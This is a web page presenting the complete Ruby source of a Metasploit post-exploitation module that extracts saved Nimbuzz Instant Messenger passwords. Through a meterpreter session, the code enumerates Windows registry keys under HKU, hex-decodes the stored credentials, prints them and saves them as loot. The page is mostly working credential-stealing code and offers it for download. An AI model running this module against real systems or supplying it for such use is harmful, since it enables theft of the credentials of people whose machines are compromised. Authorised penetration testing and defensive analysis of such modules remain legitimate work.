Metasploit - Nimbuzz Instant Messenger Password Extractor  
 
	
		  
	 
	
		  
	 
	
		Metasploit - Nimbuzz Instant Messenger Password Extractor 
	 
	
		Author: 
		Silent Dream    
	 
	
		  
	 
	
		  
	 
	
		  
	 
	
		
	 
			     	
		
	
		
		
	 
	 
	
		  
	 
	
		  
	 
	
	
		
	 
		   	 
		
		
	
			This module extracts the account passwords saved by Nimbuzz Instant 
			Messenger. It traverses through registry entries stored by Nimbuzz 
			and automatically decodes & dumps all the account passwords. 
	 
		
		
		  
	 
		
		 
	 
		
		
			  
	 
	
		
		
			  
	 
	
	
		
	 
	   	 
	
		Here is the complete Metasploit code for this module. 
	 
	
		  
	 
	
		
			## # $Id: enum_nimbuzz_pwds.rb 13399 2011-07-29 01:29:15Z sinn3r 
			$ ## ## # This file is part of the Metasploit Framework 
			and may be subject to # redistribution and commercial 
			restrictions. Please see the Metasploit # Framework web site for 
			more information on licensing and terms of use. # 
			http://metasploit.com/framework/ ## require 'msf/core' 
			require 'msf/core/post/windows/registry' class Metasploit3 < 
			Msf::Post include Msf::Post::Windows::Registry include 
			Msf::Auxiliary::Report def initialize(info={}) super( 
			update_info( info, 'Name' => 'Nimbuzz Instant Messenger Password 
			Extractor', 'Description' => %q{ This module extracts the 
			account passwords saved by Nimbuzz Instant Messenger in hex 
			format. }, 'License' => MSF_LICENSE, 'Author' => [ 
			'sil3ntdre4m <sil3ntdre4m[at]gmail.com>', 'SecurityXploded Team', 
			#www.SecurityXploded.com ], 'Version' => '$Revision: 13399 $', 
			'Platform' => [ 'windows' ], 'SessionTypes' => [ 'meterpreter' ] 
			)) end def run creds = Rex::Ui::Text::Table.new( 
			'Header' => 'Nimbuzz Instant Messenger Credentials', 'Ident' => 
			1, 'Columns' => [ 'Username', 'Password' ] ) 
			 registry_enumkeys('HKU').each do |k| next unless k.include? 
			"S-1-5-21" next if k.include? "_Classes" 
			print_status("Looking at Key #{k}") if datastore['VERBOSE'] 
			subkeys = registry_enumkeys("HKU\\#{k}\\Software\\Nimbuzz\\") 
			 if subkeys == nil or subkeys == "" print_status ("Nimbuzz 
			Instant Messenger not installed for this user.") return end 
			 user = 
			registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", 
			"Username") hpass = 
			registry_getvaldata("HKU\\#{k}\\Software\\Nimbuzz\\PCClient\\Application\\", 
			"Password") next if hpass == nil or hpass == "" hpass 
			=~ /.{11}(.*)./ decpass = [$1].pack("H*") 
			print_good("User=#{user}, Password=#{decpass}") creds << [user, 
			decpass] end print_status("Storing data...") path = 
			store_loot( 'nimbuzz.user.creds', 'text/plain', session, 
			creds, 'nimbuzz_user_creds.txt', 'Nimbuzz User Credentials' 
			) print_status("Nimbuzz user credentials saved in: #{path}") 
			end end 
			 	
	
		
		 
	 
	
		    
	 
	
		      	
	 
			
	 
	     	
	
		
		Here is the Metasploit download link to this module. 
		 
	 
	
		  
	 
	
			 
	 
	
		  
	 
	
		  
	 
	
		 
			
	 
	     	
	
		
		
			
			Source : Metasploit modules / post / windows / gather / 
			enum_nimbuzz_pwds.rb